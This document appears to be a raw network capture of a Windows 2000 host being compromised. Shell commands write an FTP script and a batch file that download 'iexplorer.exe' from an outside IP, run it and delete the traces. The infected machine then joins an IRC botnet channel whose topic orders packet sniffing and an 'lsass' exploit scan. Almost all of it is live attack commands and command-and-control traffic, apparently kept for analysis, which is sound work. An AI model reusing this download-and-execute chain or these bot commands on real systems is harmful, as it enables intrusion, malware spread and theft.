Client: echo open 122.134.5.94 5821>.pif C:\\\\WINNT\\\\system32>


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	echo open 122.134.5.94 5821>.pif C:\\WINNT\\system32> 
VICTIM:  	echo user a a>>.pif C:\\WINNT\\system32> 
VICTIM:  	echo binary>>.pif C:\\WINNT\\system32> 
VICTIM:  	echo GET iexplorer.exe>>.pif C:\\WINNT\\system32> 
VICTIM:  	echo bye>>.pif C:\\WINNT\\system32> 
VICTIM:  	echo @echo off >c.batC:\\WINNT\\system32> 
VICTIM:  	echo ftp -n -v -s:.pif >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo iexplorer.exe >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo del .pif >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo del /F c.bat >>c.batC:\\WINNT\\system32> 
VICTIM:  	echo exit /y >>c.batC:\\WINNT\\system32> 
ATTACKER:	220  
VICTIM:  	USER a 
ATTACKER:	331  
VICTIM:  	PASS a 
ATTACKER:	230  
VICTIM:  	TYPE I 
ATTACKER:	200  
VICTIM:  	PORT 192,168,1,248,4 
ATTACKER:	200  
ATTACKER:	RETR iexplorer.exe 
ATTACKER:	150  
ATTACKER:	226  
VICTIM:  	QUIT 
ATTACKER:	221  
VICTIM:  	NICK `yurwmzyUSER `yurwmzy 0 0 :`yurwmzy 
ATTACKER:	:irc.time.com NOTICE AUTH :*** Looking up your hostname...:irc.time.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead 
ATTACKER:	:irc.time.com 001 `yurwmzy :irc.time.com 002 `yurwmzy :           h1t3m IRCD | Unreal m0dd3d             :irc.time.com 003 `yurwmzy :irc.time.com 004 `yurwmzy :         www.h1t3m.org | root@h1t3m.org           :irc.time.com 005 `yurwmzy :irc.time.com 005 `yurwmzy :irc.time.com 005 `yurwmzy :irc.time.com 375 `yurwmzy :- irc.time.com Message of the Day - :irc.time.com 372 `yurwmzy :- 4/3/2008 5:26:irc.time.com 372 `yurwmzy :-                        M:irc.time.com 372 `yurwmzy :-                       dM:irc.time.com 372 `yurwmzy :-                       MMr:irc.time.com 372 `yurwmzy :-                      4MMML                  .:irc.time.com 372 `yurwmzy :-                      MMMMM.                xf:irc.time.com 372 `yurwmzy :-      .              \MMMMM               .MM-:irc.time.com 372 `yurwmzy :-       Mh..          +MMMMMM            .MMMM:irc.time.com 372 `yurwmzy :-       .MMM.         .MMMMML.          MMMMMh:irc.time.com 372 `yurwmzy :-        )MMMh.        MMMMMM         MMMMMMM:irc.time.com 372 `yurwmzy :-         3MMMMx.     'MMMMMMf      xnMMMMMM\:irc.time.com 372 `yurwmzy :-         '*MMMMM      MMMMMM.     nMMMMMMP\:irc.time.com 372 `yurwmzy :-           *MMMMMx    \MMMMM\\    .MMMMMMM=:irc.time.com 372 `yurwmzy :-            *MMMMMh   \MMMMM\   JMMMMMMP:irc.time.com 372 `yurwmzy :-              MMMMMM   3MMMM.  dMMMMMM            .:irc.time.com 372 `yurwmzy :-              
VICTIM:  	JOIN #.has hs 
ATTACKER:	  MMMMMM  \MMMM  .MMMMM(        .nnMP\:irc.time.com 372 `yurwmzy :-   =..          *MMMMx  MMM\  dMMMM\    .nnMMMMM*:irc.time.com 372 `yurwmzy :-     \MMn...     'MMMMr 'MM   MMM\   .nMMMMMMM*\:irc.time.com 372 `yurwmzy :-      \4MMMMnn..   *MMM  MM  MMP\  .dMMMMMMM\\:irc.time.com 372 `yurwmzy :-        ^MMMMMMMMx.  *ML \M .M*  .MMMMMM**\:irc.time.com 372 `yurwmzy :-           *PMMMMMMhn. *x > M  .MMMM**\\:irc.time.com 372 `yurwmzy :-              \\**MMMMhx/.h/ .=*\:irc.time.com 372 `yurwmzy :-                       .3P\%....:irc.time.com 372 `yurwmzy :-                     nP\     \*MMnx:irc.time.com 372 `yurwmzy :- Government, RIAA, ANTI-Piracy & Related Groups: By entering, you are violating:irc.time.com 372 `yurwmzy :- code 431.322.12, Internet Privacy Act signed by Bill Clinton in 1995.:irc.time.com 372 `yurwmzy :- Therefore you CANNOT threaten our ISP(s), person(s) or company(s) storing :irc.time.com 372 `yurwmzy :- these file(s) or using this network and cannot prosecute. :irc.time.com 372 `yurwmzy :- Please leave this network now as you are violating our Terms Of Use & Service.:irc.time.com 372 `yurwmzy :- :irc.time.com 372 `yurwmzy :- To view the servers rules please use \/rules\ without the quotes.:irc.time.com 376 `yurwmzy :End of /MOTD command.:irc.time.com 455 `yurwmzy :Your username `yurwmzy contained the invalid character(s) ` and has been changed to yurwmzy. Please use only the characte 
ATTACKER:	rs 0-9 a-z A-Z _ - or . in your username. Your username is the part before the @ in your email address.:`yurwmzy MODE `yurwmzy :+iwxG 
VICTIM:  	USERHOST `yurwmzyJOIN #.has hsUSERHOST `yurwmzyJOIN #.has hsUSERHOST `yurwmzyJOIN #.has hsUSERHOST `yurwmzy 
ATTACKER:	:`yurwmzy!~yurwmzy@B661FE5B.35D11F93.763A0D3A.IP JOIN :#.has:irc.time.com 332 `yurwmzy #.has :.join #.k |`sniff.on -s |`adv.start lsass 100 3 0 x.x.x.x -r -s |`i.join #.sd:irc.time.com 333 `yurwmzy #.has Hs 1218451848 
VICTIM:  	JOIN #.sd  
ATTACKER:	:irc.time.com 302 `yurwmzy :`yurwmzy=+~yurwmzy@192.168.1.248    :irc.time.com 302 `yurwmzy :`yurwmzy=+~yurwmzy@192.168.1.248    :irc.time.com 302 `yurwmzy :`yurwmzy=+~yurwmzy@192.168.1.248    :irc.time.com 302 `yurwmzy :`yurwmzy=+~yurwmzy@192.168.1.248